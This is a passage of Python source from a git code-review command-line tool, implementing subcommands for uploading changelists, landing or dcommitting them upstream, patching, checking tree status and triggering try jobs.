# * refs/remotes/branch-heads/test -> refs/branch-heads/test
if remote_branch.startswith('refs/remotes/%s/refs/' % remote):
remote_branch = remote_branch.replace('refs/remotes/%s/' % remote, '')
elif remote_branch.startswith('refs/remotes/%s/' % remote):
remote_branch = remote_branch.replace('refs/remotes/%s/' % remote,
'refs/heads/')
elif remote_branch.startswith('refs/remotes/branch-heads'):
remote_branch = remote_branch.replace('refs/remotes/', 'refs/')
# If a pending prefix exists then replace refs/ with it.
if pending_prefix:
remote_branch = remote_branch.replace('refs/', pending_prefix)
return remote_branch
def cleanup_list(l):
"""Fixes a list so that comma separated items are put as individual items.
So that "--reviewers joe@c,john@c --reviewers joa@c" results in
options.reviewers == sorted(['joe@c', 'john@c', 'joa@c']).
"""
items = sum((i.split(',') for i in l), [])
stripped_items = (i.strip() for i in items)
return sorted(filter(None, stripped_items))
@subcommand.usage('[args to "git diff"]')
def CMDupload(parser, args):
"""Uploads the current changelist to codereview.
Can skip dependency patchset uploads for a branch by running:
git config branch.branch_name.skip-deps-uploads True
To unset run:
git config --unset branch.branch_name.skip-deps-uploads
Can also set the above globally by using the --global flag.
"""
parser.add_option('--bypass-hooks', action='store_true', dest='bypass_hooks',
help='bypass upload presubmit hook')
parser.add_option('--bypass-watchlists', action='store_true',
dest='bypass_watchlists',
help='bypass watchlists auto CC-ing reviewers')
parser.add_option('-f', action='store_true', dest='force',
help="force yes to questions (don't prompt)")
parser.add_option('-m', dest='message', help='message for patchset')
parser.add_option('--message-file', dest='message_file',
help='file which contains message for patchset')
parser.add_option('-t', dest='title',
help='title for patchset (Rietveld only)')
parser.add_option('-r', '--reviewers',
action='append', default=[],
help='reviewer email addresses')
parser.add_option('--cc',
action='append', default=[],
help='cc email addresses')
parser.add_option('-s', '--send-mail', action='store_true',
help='send email to reviewer immediately')
parser.add_option('--emulate_svn_auto_props',
'--emulate-svn-auto-props',
action="store_true",
dest="emulate_svn_auto_props",
help="Emulate Subversion's auto properties feature.")
parser.add_option('-c', '--use-commit-queue', action='store_true',
help='tell the commit queue to commit this patchset')
parser.add_option('--private', action='store_true',
help='set the review private (rietveld only)')
parser.add_option('--target_branch',
'--target-branch',
metavar='TARGET',
help='Apply CL to remote ref TARGET. ' +
'Default: remote branch head, or master')
parser.add_option('--squash', action='store_true',
help='Squash multiple commits into one (Gerrit only)')
parser.add_option('--no-squash', action='store_true',
help='Don\'t squash multiple commits into one ' +
'(Gerrit only)')
parser.add_option('--email', default=None,
help='email address to use to connect to Rietveld')
parser.add_option('--tbr-owners', dest='tbr_owners', action='store_true',
help='add a set of OWNERS to TBR')
parser.add_option('-d', '--cq-dry-run', dest='cq_dry_run',
action='store_true',
help='Send the patchset to do a CQ dry run right after '
'upload.')
parser.add_option('--dependencies', action='store_true',
help='Uploads CLs of all the local branches that depend on '
'the current branch')
orig_args = args
add_git_similarity(parser)
auth.add_auth_options(parser)
_add_codereview_select_options(parser)
(options, args) = parser.parse_args(args)
_process_codereview_select_options(parser, options)
auth_config = auth.extract_auth_config_from_options(options)
if git_common.is_dirty_git_tree('upload'):
return 1
options.reviewers = cleanup_list(options.reviewers)
options.cc = cleanup_list(options.cc)
if options.message_file:
if options.message:
parser.error('only one of --message and --message-file allowed.')
options.message = gclient_utils.FileRead(options.message_file)
options.message_file = None
# For sanity of test expectations, do this otherwise lazy-loading *now*.
settings.GetIsGerrit()
cl = Changelist(auth_config=auth_config, codereview=options.forced_codereview)
return cl.CMDUpload(options, args, orig_args)
def IsSubmoduleMergeCommit(ref):
# When submodules are added to the repo, we expect there to be a single
# non-git-svn merge commit at remote HEAD with a signature comment.
pattern = '^SVN changes up to revision [0-9]*$'
cmd = ['rev-list', '--merges', '--grep=%s' % pattern, '%s^!' % ref]
return RunGit(cmd) != ''
def SendUpstream(parser, args, cmd):
"""Common code for CMDland and CmdDCommit
In case of Gerrit, uses Gerrit REST api to "submit" the issue, which pushes
upstream and closes the issue automatically and atomically.
Otherwise (in case of Rietveld):
Squashes branch into a single commit.
Updates changelog with metadata (e.g. pointer to review).
Pushes/dcommits the code upstream.
Updates review and closes.
"""
parser.add_option('--bypass-hooks', action='store_true', dest='bypass_hooks',
help='bypass upload presubmit hook')
parser.add_option('-m', dest='message',
help="override review description")
parser.add_option('-f', action='store_true', dest='force',
help="force yes to questions (don't prompt)")
parser.add_option('-c', dest='contributor',
help="external contributor for patch (appended to " +
"description and used as author for git). Should be " +
"formatted as 'First Last <[email protected]>'")
add_git_similarity(parser)
auth.add_auth_options(parser)
(options, args) = parser.parse_args(args)
auth_config = auth.extract_auth_config_from_options(options)
cl = Changelist(auth_config=auth_config)
# TODO(tandrii): refactor this into _RietveldChangelistImpl method.
if cl.IsGerrit():
if options.message:
# This could be implemented, but it requires sending a new patch to
# Gerrit, as Gerrit unlike Rietveld versions messages with patchsets.
# Besides, Gerrit has the ability to change the commit message on submit
# automatically, thus there is no need to support this option (so far?).
parser.error('-m MESSAGE option is not supported for Gerrit.')
if options.contributor:
parser.error(
'-c CONTRIBUTOR option is not supported for Gerrit.\n'
'Before uploading a commit to Gerrit, ensure it\'s author field is '
'the contributor\'s "name <email>". If you can\'t upload such a '
'commit for review, contact your repository admin and request'
'"Forge-Author" permission.')
return cl._codereview_impl.CMDLand(options.force, options.bypass_hooks,
options.verbose)
current = cl.GetBranch()
remote, upstream_branch = cl.FetchUpstreamTuple(cl.GetBranch())
if not settings.GetIsGitSvn() and remote == '.':
print()
print('Attempting to push branch %r into another local branch!' % current)
print()
print('Either reparent this branch on top of origin/master:')
print(' git reparent-branch --root')
print()
print('OR run `git rebase-update` if you think the parent branch is ')
print('already committed.')
print()
print(' Current parent: %r' % upstream_branch)
return 1
if not args or cmd == 'land':
# Default to merging against our best guess of the upstream branch.
args = [cl.GetUpstreamBranch()]
if options.contributor:
if not re.match('^.*\s<\S+@\S+>$', options.contributor):
print("Please provide contibutor as 'First Last <[email protected]>'")
return 1
base_branch = args[0]
base_has_submodules = IsSubmoduleMergeCommit(base_branch)
if git_common.is_dirty_git_tree(cmd):
return 1
# This rev-list syntax means "show all commits not in my branch that
# are in base_branch".
upstream_commits = RunGit(['rev-list', '^' + cl.GetBranchRef(),
base_branch]).splitlines()
if upstream_commits:
print('Base branch "%s" has %d commits '
'not in this branch.' % (base_branch, len(upstream_commits)))
print('Run "git merge %s" before attempting to %s.' % (base_branch, cmd))
return 1
# This is the revision `svn dcommit` will commit on top of.
svn_head = None
if cmd == 'dcommit' or base_has_submodules:
svn_head = RunGit(['log', '--grep=^git-svn-id:', '-1',
'--pretty=format:%H'])
if cmd == 'dcommit':
# If the base_head is a submodule merge commit, the first parent of the
# base_head should be a git-svn commit, which is what we're interested in.
base_svn_head = base_branch
if base_has_submodules:
base_svn_head += '^1'
extra_commits = RunGit(['rev-list', '^' + svn_head, base_svn_head])
if extra_commits:
print('This branch has %d additional commits not upstreamed yet.'
% len(extra_commits.splitlines()))
print('Upstream "%s" or rebase this branch on top of the upstream trunk '
'before attempting to %s.' % (base_branch, cmd))
return 1
merge_base = RunGit(['merge-base', base_branch, 'HEAD']).strip()
if not options.bypass_hooks:
author = None
if options.contributor:
author = re.search(r'\<(.*)\>', options.contributor).group(1)
hook_results = cl.RunHook(
committing=True,
may_prompt=not options.force,
verbose=options.verbose,
change=cl.GetChange(merge_base, author))
if not hook_results.should_continue():
return 1
# Check the tree status if the tree status URL is set.
status = GetTreeStatus()
if 'closed' == status:
print('The tree is closed. Please wait for it to reopen. Use '
'"git cl %s --bypass-hooks" to commit on a closed tree.' % cmd)
return 1
elif 'unknown' == status:
print('Unable to determine tree status. Please verify manually and '
'use "git cl %s --bypass-hooks" to commit on a closed tree.' % cmd)
return 1
change_desc = ChangeDescription(options.message)
if not change_desc.description and cl.GetIssue():
change_desc = ChangeDescription(cl.GetDescription())
if not change_desc.description:
if not cl.GetIssue() and options.bypass_hooks:
change_desc = ChangeDescription(CreateDescriptionFromLog([merge_base]))
else:
print('No description set.')
print('Visit %s/edit to set it.' % (cl.GetIssueURL()))
return 1
# Keep a separate copy for the commit message, because the commit message
# contains the link to the Rietveld issue, while the Rietveld message contains
# the commit viewvc url.
# Keep a separate copy for the commit message.
if cl.GetIssue():
change_desc.update_reviewers(cl.GetApprovingReviewers())
commit_desc = ChangeDescription(change_desc.description)
if cl.GetIssue():
# Xcode won't linkify this URL unless there is a non-whitespace character
# after it. Add a period on a new line to circumvent this. Also add a space
# before the period to make sure that Gitiles continues to correctly resolve
# the URL.
commit_desc.append_footer('Review URL: %s .' % cl.GetIssueURL())
if options.contributor:
commit_desc.append_footer('Patch from %s.' % options.contributor)
print('Description:')
print(commit_desc.description)
branches = [merge_base, cl.GetBranchRef()]
if not options.force:
print_stats(options.similarity, options.find_copies, branches)
# We want to squash all this branch's commits into one commit with the proper
# description. We do this by doing a "reset --soft" to the base branch (which
# keeps the working copy the same), then dcommitting that. If origin/master
# has a submodule merge commit, we'll also need to cherry-pick the squashed
# commit onto a branch based on the git-svn head.
MERGE_BRANCH = 'git-cl-commit'
CHERRY_PICK_BRANCH = 'git-cl-cherry-pick'
# Delete the branches if they exist.
for branch in [MERGE_BRANCH, CHERRY_PICK_BRANCH]:
showref_cmd = ['show-ref', '--quiet', '--verify', 'refs/heads/%s' % branch]
result = RunGitWithCode(showref_cmd)
if result[0] == 0:
RunGit(['branch', '-D', branch])
# We might be in a directory that's present in this branch but not in the
# trunk. Move up to the top of the tree so that git commands that expect a
# valid CWD won't fail after we check out the merge branch.
rel_base_path = settings.GetRelativeRoot()
if rel_base_path:
os.chdir(rel_base_path)
# Stuff our change into the merge branch.
# We wrap in a try...finally block so if anything goes wrong,
# we clean up the branches.
retcode = -1
pushed_to_pending = False
pending_ref = None
revision = None
try:
RunGit(['checkout', '-q', '-b', MERGE_BRANCH])
RunGit(['reset', '--soft', merge_base])
if options.contributor:
RunGit(
[
'commit', '--author', options.contributor,
'-m', commit_desc.description,
])
else:
RunGit(['commit', '-m', commit_desc.description])
if base_has_submodules:
cherry_pick_commit = RunGit(['rev-list', 'HEAD^!']).rstrip()
RunGit(['branch', CHERRY_PICK_BRANCH, svn_head])
RunGit(['checkout', CHERRY_PICK_BRANCH])
RunGit(['cherry-pick', cherry_pick_commit])
if cmd == 'land':
remote, branch = cl.FetchUpstreamTuple(cl.GetBranch())
mirror = settings.GetGitMirror(remote)
pushurl = mirror.url if mirror else remote
pending_prefix = settings.GetPendingRefPrefix()
if not pending_prefix or branch.startswith(pending_prefix):
# If not using refs/pending/heads/* at all, or target ref is already set
# to pending, then push to the target ref directly.
retcode, output = RunGitWithCode(
['push', '--porcelain', pushurl, 'HEAD:%s' % branch])
pushed_to_pending = pending_prefix and branch.startswith(pending_prefix)
else:
# Cherry-pick the change on top of pending ref and then push it.
assert branch.startswith('refs/'), branch
assert pending_prefix[-1] == '/', pending_prefix
pending_ref = pending_prefix + branch[len('refs/'):]
retcode, output = PushToGitPending(pushurl, pending_ref, branch)
pushed_to_pending = (retcode == 0)
if retcode == 0:
revision = RunGit(['rev-parse', 'HEAD']).strip()
else:
# dcommit the merge branch.
cmd_args = [
'svn', 'dcommit',
'-C%s' % options.similarity,
'--no-rebase', '--rmdir',
]
if settings.GetForceHttpsCommitUrl():
# Allow forcing https commit URLs for some projects that don't allow
# committing to http URLs (like Google Code).
remote_url = cl.GetGitSvnRemoteUrl()
if urlparse.urlparse(remote_url).scheme == 'http':
remote_url = remote_url.replace('http://', 'https://')
cmd_args.append('--commit-url=%s' % remote_url)
_, output = RunGitWithCode(cmd_args)
if 'Committed r' in output:
revision = re.match(
'.*?\nCommitted r(\\d+)', output, re.DOTALL).group(1)
logging.debug(output)
finally:
# And then swap back to the original branch and clean up.
RunGit(['checkout', '-q', cl.GetBranch()])
RunGit(['branch', '-D', MERGE_BRANCH])
if base_has_submodules:
RunGit(['branch', '-D', CHERRY_PICK_BRANCH])
if not revision:
print('Failed to push. If this persists, please file a bug.')
return 1
killed = False
if pushed_to_pending:
try:
revision = WaitForRealCommit(remote, revision, base_branch, branch)
# We set pushed_to_pending to False, since it made it all the way to the
# real ref.
pushed_to_pending = False
except KeyboardInterrupt:
killed = True
if cl.GetIssue():
to_pending = ' to pending queue' if pushed_to_pending else ''
viewvc_url = settings.GetViewVCUrl()
if not to_pending:
if viewvc_url and revision:
change_desc.append_footer(
'Committed: %s%s' % (viewvc_url, revision))
elif revision:
change_desc.append_footer('Committed: %s' % (revision,))
print('Closing issue '
'(you may be prompted for your codereview password)...')
cl.UpdateDescription(change_desc.description)
cl.CloseIssue()
props = cl.GetIssueProperties()
patch_num = len(props['patchsets'])
comment = "Committed patchset #%d (id:%d)%s manually as %s" % (
patch_num, props['patchsets'][-1], to_pending, revision)
if options.bypass_hooks:
comment += ' (tree was closed).' if GetTreeStatus() == 'closed' else '.'
else:
comment += ' (presubmit successful).'
cl.RpcServer().add_comment(cl.GetIssue(), comment)
cl.SetIssue(None)
if pushed_to_pending:
_, branch = cl.FetchUpstreamTuple(cl.GetBranch())
print('The commit is in the pending queue (%s).' % pending_ref)
print('It will show up on %s in ~1 min, once it gets a Cr-Commit-Position '
'footer.' % branch)
hook = POSTUPSTREAM_HOOK_PATTERN % cmd
if os.path.isfile(hook):
RunCommand([hook, merge_base], error_ok=True)
return 1 if killed else 0
def WaitForRealCommit(remote, pushed_commit, local_base_ref, real_ref):
print()
print('Waiting for commit to be landed on %s...' % real_ref)
print('(If you are impatient, you may Ctrl-C once without harm)')
target_tree = RunGit(['rev-parse', '%s:' % pushed_commit]).strip()
current_rev = RunGit(['rev-parse', local_base_ref]).strip()
mirror = settings.GetGitMirror(remote)
loop = 0
while True:
sys.stdout.write('fetching (%d)... \r' % loop)
sys.stdout.flush()
loop += 1
if mirror:
mirror.populate()
RunGit(['retry', 'fetch', remote, real_ref], stderr=subprocess2.VOID)
to_rev = RunGit(['rev-parse', 'FETCH_HEAD']).strip()
commits = RunGit(['rev-list', '%s..%s' % (current_rev, to_rev)])
for commit in commits.splitlines():
if RunGit(['rev-parse', '%s:' % commit]).strip() == target_tree:
print('Found commit on %s' % real_ref)
return commit
current_rev = to_rev
def PushToGitPending(remote, pending_ref, upstream_ref):
"""Fetches pending_ref, cherry-picks current HEAD on top of it, pushes.
Returns:
(retcode of last operation, output log of last operation).
"""
assert pending_ref.startswith('refs/'), pending_ref
local_pending_ref = 'refs/git-cl/' + pending_ref[len('refs/'):]
cherry = RunGit(['rev-parse', 'HEAD']).strip()
code = 0
out = ''
max_attempts = 3
attempts_left = max_attempts
while attempts_left:
if attempts_left != max_attempts:
print('Retrying, %d attempts left...' % (attempts_left - 1,))
attempts_left -= 1
# Fetch. Retry fetch errors.
print('Fetching pending ref %s...' % pending_ref)
code, out = RunGitWithCode(
['retry', 'fetch', remote, '+%s:%s' % (pending_ref, local_pending_ref)])
if code:
print('Fetch failed with exit code %d.' % code)
if out.strip():
print(out.strip())
continue
# Try to cherry pick. Abort on merge conflicts.
print('Cherry-picking commit on top of pending ref...')
RunGitWithCode(['checkout', local_pending_ref], suppress_stderr=True)
code, out = RunGitWithCode(['cherry-pick', cherry])
if code:
print('Your patch doesn\'t apply cleanly to ref \'%s\', '
'the following files have merge conflicts:' % pending_ref)
print(RunGit(['diff', '--name-status', '--diff-filter=U']).strip())
print('Please rebase your patch and try again.')
RunGitWithCode(['cherry-pick', '--abort'])
return code, out
# Applied cleanly, try to push now. Retry on error (flake or non-ff push).
print('Pushing commit to %s... It can take a while.' % pending_ref)
code, out = RunGitWithCode(
['retry', 'push', '--porcelain', remote, 'HEAD:%s' % pending_ref])
if code == 0:
# Success.
print('Commit pushed to pending ref successfully!')
return code, out
print('Push failed with exit code %d.' % code)
if out.strip():
print(out.strip())
if IsFatalPushFailure(out):
print('Fatal push error. Make sure your .netrc credentials and git '
'user.email are correct and you have push access to the repo.')
return code, out
print('All attempts to push to pending ref failed.')
return code, out
def IsFatalPushFailure(push_stdout):
"""True if retrying push won't help."""
return '(prohibited by Gerrit)' in push_stdout
@subcommand.usage('[upstream branch to apply against]')
def CMDdcommit(parser, args):
"""Commits the current changelist via git-svn."""
if not settings.GetIsGitSvn():
if git_footers.get_footer_svn_id():
# If it looks like previous commits were mirrored with git-svn.
message = """This repository appears to be a git-svn mirror, but no
upstream SVN master is set. You probably need to run 'git auto-svn' once."""
else:
message = """This doesn't appear to be an SVN repository.
If your project has a true, writeable git repository, you probably want to run
'git cl land' instead.
If your project has a git mirror of an upstream SVN master, you probably need
to run 'git svn init'.
Using the wrong command might cause your commit to appear to succeed, and the
review to be closed, without actually landing upstream. If you choose to
proceed, please verify that the commit lands upstream as expected."""
print(message)
ask_for_data('[Press enter to dcommit or ctrl-C to quit]')
# TODO(tandrii): kill this post SVN migration with
# https://codereview.chromium.org/2076683002
print('WARNING: chrome infrastructure is migrating SVN repos to Git.\n'
'Please let us know of this project you are committing to:'
' http://crbug.com/600451')
return SendUpstream(parser, args, 'dcommit')
@subcommand.usage('[upstream branch to apply against]')
def CMDland(parser, args):
"""Commits the current changelist via git."""
if settings.GetIsGitSvn() or git_footers.get_footer_svn_id():
print('This appears to be an SVN repository.')
print('Are you sure you didn\'t mean \'git cl dcommit\'?')
print('(Ignore if this is the first commit after migrating from svn->git)')
ask_for_data('[Press enter to push or ctrl-C to quit]')
return SendUpstream(parser, args, 'land')
@subcommand.usage('<patch url or issue id or issue url>')
def CMDpatch(parser, args):
"""Patches in a code review."""
parser.add_option('-b', dest='newbranch',
help='create a new branch off trunk for the patch')
parser.add_option('-f', '--force', action='store_true',
help='with -b, clobber any existing branch')
parser.add_option('-d', '--directory', action='store', metavar='DIR',
help='Change to the directory DIR immediately, '
'before doing anything else. Rietveld only.')
parser.add_option('--reject', action='store_true',
help='failed patches spew .rej files rather than '
'attempting a 3-way merge. Rietveld only.')
parser.add_option('-n', '--no-commit', action='store_true', dest='nocommit',
help='don\'t commit after patch applies. Rietveld only.')
group = optparse.OptionGroup(
parser,
'Options for continuing work on the current issue uploaded from a '
'different clone (e.g. different machine). Must be used independently '
'from the other options. No issue number should be specified, and the '
'branch must have an issue number associated with it')
group.add_option('--reapply', action='store_true', dest='reapply',
help='Reset the branch and reapply the issue.\n'
'CAUTION: This will undo any local changes in this '
'branch')
group.add_option('--pull', action='store_true', dest='pull',
help='Performs a pull before reapplying.')
parser.add_option_group(group)
auth.add_auth_options(parser)
_add_codereview_select_options(parser)
(options, args) = parser.parse_args(args)
_process_codereview_select_options(parser, options)
auth_config = auth.extract_auth_config_from_options(options)
if options.reapply :
if options.newbranch:
parser.error('--reapply works on the current branch only')
if len(args) > 0:
parser.error('--reapply implies no additional arguments')
cl = Changelist(auth_config=auth_config,
codereview=options.forced_codereview)
if not cl.GetIssue():
parser.error('current branch must have an associated issue')
upstream = cl.GetUpstreamBranch()
if upstream == None:
parser.error('No upstream branch specified. Cannot reset branch')
RunGit(['reset', '--hard', upstream])
if options.pull:
RunGit(['pull'])
return cl.CMDPatchIssue(cl.GetIssue(), options.reject, options.nocommit,
options.directory)
if len(args) != 1 or not args[0]:
parser.error('Must specify issue number or url')
# We don't want uncommitted changes mixed up with the patch.
if git_common.is_dirty_git_tree('patch'):
return 1
if options.newbranch:
if options.force:
RunGit(['branch', '-D', options.newbranch],
stderr=subprocess2.PIPE, error_ok=True)
RunGit(['new-branch', options.newbranch])
cl = Changelist(auth_config=auth_config, codereview=options.forced_codereview)
if cl.IsGerrit():
if options.reject:
parser.error('--reject is not supported with Gerrit codereview.')
if options.nocommit:
parser.error('--nocommit is not supported with Gerrit codereview.')
if options.directory:
parser.error('--directory is not supported with Gerrit codereview.')
return cl.CMDPatchIssue(args[0], options.reject, options.nocommit,
options.directory)
def CMDrebase(parser, args):
"""Rebases current branch on top of svn repo."""
# Provide a wrapper for git svn rebase to help avoid accidental
# git svn dcommit.
# It's the only command that doesn't use parser at all since we just defer
# execution to git-svn.
return RunGitWithCode(['svn', 'rebase'] + args)[1]
def GetTreeStatus(url=None):
"""Fetches the tree status and returns either 'open', 'closed',
'unknown' or 'unset'."""
url = url or settings.GetTreeStatusUrl(error_ok=True)
if url:
status = urllib2.urlopen(url).read().lower()
if status.find('closed') != -1 or status == '0':
return 'closed'
elif status.find('open') != -1 or status == '1':
return 'open'
return 'unknown'
return 'unset'
def GetTreeStatusReason():
"""Fetches the tree status from a json url and returns the message
with the reason for the tree to be opened or closed."""
url = settings.GetTreeStatusUrl()
json_url = urlparse.urljoin(url, '/current?format=json')
connection = urllib2.urlopen(json_url)
status = json.loads(connection.read())
connection.close()
return status['message']
def GetBuilderMaster(bot_list):
"""For a given builder, fetch the master from AE if available."""
map_url = 'https://builders-map.appspot.com/'
try:
master_map = json.load(urllib2.urlopen(map_url))
except urllib2.URLError as e:
return None, ('Failed to fetch builder-to-master map from %s. Error: %s.' %
(map_url, e))
except ValueError as e:
return None, ('Invalid json string from %s. Error: %s.' % (map_url, e))
if not master_map:
return None, 'Failed to build master map.'
result_master = ''
for bot in bot_list:
builder = bot.split(':', 1)[0]
master_list = master_map.get(builder, [])
if not master_list:
return None, ('No matching master for builder %s.' % builder)
elif len(master_list) > 1:
return None, ('The builder name %s exists in multiple masters %s.' %
(builder, master_list))
else:
cur_master = master_list[0]
if not result_master:
result_master = cur_master
elif result_master != cur_master:
return None, 'The builders do not belong to the same master.'
return result_master, None
def CMDtree(parser, args):
"""Shows the status of the tree."""
_, args = parser.parse_args(args)
status = GetTreeStatus()
if 'unset' == status:
print('You must configure your tree status URL by running "git cl config".')
return 2
print('The tree is %s' % status)
print()
print(GetTreeStatusReason())
if status != 'open':
return 1
return 0
def CMDtry(parser, args):
"""Triggers try jobs through BuildBucket."""
group = optparse.OptionGroup(parser, "Try job options")
group.add_option(
"-b", "--bot", action="append",
help=("IMPORTANT: specify ONE builder per --bot flag. Use it multiple "
"times to specify multiple builders. ex: "
"'-b win_rel -b win_layout'. See "
"the try server waterfall for the builders name and the tests "
"available."))
group.add_option(
"-m", "--master", default='',
help=("Specify a try master where to run the tries."))
group.add_option( "--luci", action='store_true')
group.add_option(
"-r", "--revision",
help="Revision to use for the try job; default: the "
"revision will be determined by the try server; see "
"its waterfall for more info")
group.add_option(
"-c", "--clobber", action="store_true", default=False,
help="Force a clobber before building; e.g. don't do an "
"incremental build")
group.add_option(
"--project",
help="Override which project to use. Projects are defined "
"server-side to define what default bot set to use")
group.add_option(
"-p", "--property", dest="properties", action="append", default=[],
help="Specify generic properties in the form -p key1=value1 -p "
"key2=value2 etc (buildbucket only). The value will be treated as "
"json if decodable, or as string otherwise.")
group.add_option(
"-n", "--name", help="Try job name; default to current branch name")
group.add_option(
"--use-rietveld", action="store_true", default=False,
help="Use Rietveld to trigger try jobs.")
group.add_option(
"--buildbucket-host", default='cr-buildbucket.appspot.com',
help="Host of buildbucket. The default host is %default.")
parser.add_option_group(group)
auth.add_auth_options(parser)
options, args = parser.parse_args(args)
auth_config = auth.extract_auth_config_from_options(options)
if options.use_rietveld and options.properties:
parser.error('Properties can only be specified with buildbucket')
# Make sure that all properties are prop=value pairs.
bad_params = [x for x in options.properties if '=' not in x]
if bad_params:
parser.error('Got properties with missing "=": %s' % bad_params)
if args:
parser.error('Unknown arguments: %s' % args)
cl = Changelist(auth_config=auth_config)
if not cl.GetIssue():
parser.error('Need to upload first')
if cl.IsGerrit():
parser.error(
'Not yet supported for Gerrit (http://crbug.com/599931).\n'
'If your project has Commit Queue, dry run is a workaround:\n'
' git cl set-commit --dry-run')
# Code below assumes Rietveld issue.
# TODO(tandrii): actually implement for Gerrit http://crbug.com/599931.
props = cl.GetIssueProperties()
if props.get('closed'):
parser.error('Cannot send tryjobs for a closed CL')
if props.get('private'):
parser.error('Cannot use trybots with private issue')
if not options.name:
options.name = cl.GetBranch()
if options.bot and not options.master:
options.master, err_msg = GetBuilderMaster(options.bot)
if err_msg:
parser.error('Tryserver master cannot be found because: %s\n'
'Please manually specify the tryserver master'
', e.g. "-m tryserver.chromium.linux".' % err_msg)
def GetMasterMap():
# Process --bot.
if not options.bot:
change = cl.GetChange(cl.GetCommonAncestorWithUpstream(), None)
# Get try masters from PRESUBMIT.py files.
masters = presubmit_support.DoGetTryMasters(
change,
change.LocalPaths(),
settings.GetRoot(),
None,
None,
options.verbose,
sys.stdout)
if masters:
return masters
# Fall back to deprecated method: get try slaves from PRESUBMIT.py files.
options.bot = presubmit_support.DoGetTrySlaves(
change,
change.LocalPaths(),
settings.GetRoot(),
None,
None,
options.verbose,
sys.stdout)
if not options.bot:
# Get try masters from cq.cfg if any.
# TODO(tandrii): some (but very few) projects store cq.cfg in different
# location.
cq_cfg = os.path.join(change.RepositoryRoot(),
'infra', 'config', 'cq.cfg')
if os.path.exists(cq_cfg):
masters = {}
cq_masters = commit_queue.get_master_builder_map(
cq_cfg, include_experimental=False, include_triggered=False)
for master, builders in cq_masters.iteritems():
for builder in builders:
# Skip presubmit builders, because these will fail without LGTM.
masters.setdefault(master, {})[builder] = ['defaulttests']
if masters:
print('Loaded default bots from CQ config (%s)' % cq_cfg)
return masters
else:
print('CQ config exists (%s) but has no try bots listed' % cq_cfg)
if not options.bot:
parser.error('No default try builder to try, use --bot')
builders_and_tests = {}
# TODO(machenbach): The old style command-line options don't support
# multiple try masters yet.
old_style = filter(lambda x: isinstance(x, basestring), options.bot)
new_style = filter(lambda x: isinstance(x, tuple), options.bot)
for bot in old_style:
if ':' in bot:
parser.error('Specifying testfilter is no longer supported')
elif ',' in bot:
parser.error('Specify one bot per --bot flag')
else:
builders_and_tests.setdefault(bot, [])
for bot, tests in new_style:
builders_and_tests.setdefault(bot, []).extend(tests)
# Return a master map with one master to be backwards compatible. The
# master name defaults to an empty string, which will cause the master
# not to be set on rietveld (deprecated).
return {options.master: builders_and_tests}
masters = GetMasterMap()
for builders in masters.itervalues():
if any('triggered' in b for b in builders):
print('ERROR You are trying to send a job to a triggered bot. This type '
'of bot requires an\ninitial job from a parent (usually a builder).'
' Instead send your job to the parent.\n'
'Bot list: %s' % builders, file=sys.stderr)
return 1
patchset = cl.GetMostRecentPatchset()
if patchset and patchset != cl.GetPatchset():
print(
'\nWARNING Mismatch between local config and server. Did a previous '
'upload fail?\ngit-cl try always uses latest patchset from rietveld. '
'Continuing using\npatchset %s.\n' % patchset)
if options.luci:
trigger_luci_job(cl, masters, options)
elif not options.use_rietveld:
try:
trigger_try_jobs(auth_config, cl, options, masters, 'git_cl_try')
except BuildbucketResponseException as ex:
print('ERROR: %s' % ex)
return 1
except Exception as e:
stacktrace = (''.join(traceback.format_stack()) + traceback.format_exc())
print('ERROR: Exception when trying to trigger tryjobs: %s\n%s' %
(e, stacktrace))
return 1
else:
try:
cl.RpcServer().trigger_distributed_try_jobs(
cl.GetIssue(), patchset, options.name, options.clobber,
options.revision, masters)
except urllib2.HTTPError as e:
if e.code == 404:
print('404 from rietveld; '
'did you mean to use "git try" instead of "git cl try"?')
return 1
print('Tried jobs on:')
for (master, builders) in sorted(masters.iteritems()):
if master:
print('Master: %s' % master)
length = max(len(builder) for builder in builders)
for builder in sorted(builders):
print(' %*s: %s' % (length, builder, ','.join(builders[builder])))
return 0
def CMDtry_results(parser, args):
group = optparse.OptionGroup(parser, "Try job results options")
group.add_option(
"-p", "--patchset", type=int, help="patchset number if not current.")
group.add_option(
"--print-master", action='store_true', help="print master name as well.")
group.add_option(
"--color", action='store_true', default=setup_color.IS_TTY,
help="force color output, useful when piping output.")
group.add_option(
"--buildbucket-host", default='cr-buildbucket.appspot.com',
help="Host of buildbucket. The default host is %default.")
parser.add_option_group(group)
auth.add_auth_options(parser)
options, args = parser.parse_args(args)
if args:
parser.error('Unrecognized args: %s' % ' '.join(args))
auth_config = auth.extract_auth_config_from_options(options)
cl = Changelist(auth_config=auth_config)
if not cl.GetIssue():
parser.error('Need to upload first')
if not options.patchset:
options.patchset = cl.GetMostRecentPatchset()
if options.patchset and options.patchset != cl.GetPatchset():
print(
'\nWARNING Mismatch between local config and server. Did a previous '
'upload fail?\ngit-cl try always uses latest patchset from rietveld. '
'Continuing using\npatchset %s.\n' % options.patchset)
try:
jobs = fetch_try_jobs(auth_config, cl, options)
except BuildbucketResponseException as ex:
print('Buildbucket error: %s' % ex)
return 1
except Exception as e:
stacktrace = (''.join(traceback.format_stack()) + traceback.format_exc())
print('ERROR: Exception when trying to fetch tryjobs: %s\n%s' %
(e, stacktrace))
return 1
print_tryjobs(options, jobs)
return 0
@subcommand.usage('[new upstream branch]')
def CMDupstream(parser, args):
"""Prints or sets the name of the upstream branch, if any."""
_, args = parser.parse_args(args)
if len(args) > 1:
parser.error('Unrecognized args: %s' % ' '.join(args))
cl = Changelist()
if args:
# One arg means set upstream branch.
branch = cl.GetBranch()
RunGit(['branch', '--set-upstream', branch, args[0]])
cl = Changelist()
print('Upstream branch set to %s' % (cl.GetUpstreamBranch(),))
# Clear configured merge-base, if there is one.
git_common.remove_merge_base(branch)
else:
print(cl.GetUpstreamBranch())
return 0
def CMDweb(parser, args):
"""Opens the current CL in the web browser."""
_, args = parser.parse_args(args)
if args:
parser.error('Unrecognized args: %s' % ' '.join(args))
issue_url = Changelist().GetIssueURL()
if not issue_url:
print('ERROR No issue to open', file=sys.stderr)
return 1
webbrowser.open(issue_url)
return 0
def CMDset_commit(parser, args):
"""Sets the commit bit to trigger the Commit Queue."""
parser.add_option('-d', '--dry-run', action='store_true',
help='trigger in dry run mode')
parser.add_option('-c', '--clear', action='store_true',
help='stop CQ run, if any')
auth.add_auth_options(parser)
options, args = parser.parse_args(args)
auth_config = auth.extract_auth_config_from_options(options)
if args:
parser.error('Unrecognized args: %s' % ' '.join(args))
if options.dry_run and options.clear:
parser.error('Make up your mind: both --dry-run and --clear not allowed')
cl = Changelist(auth_config=auth_config)
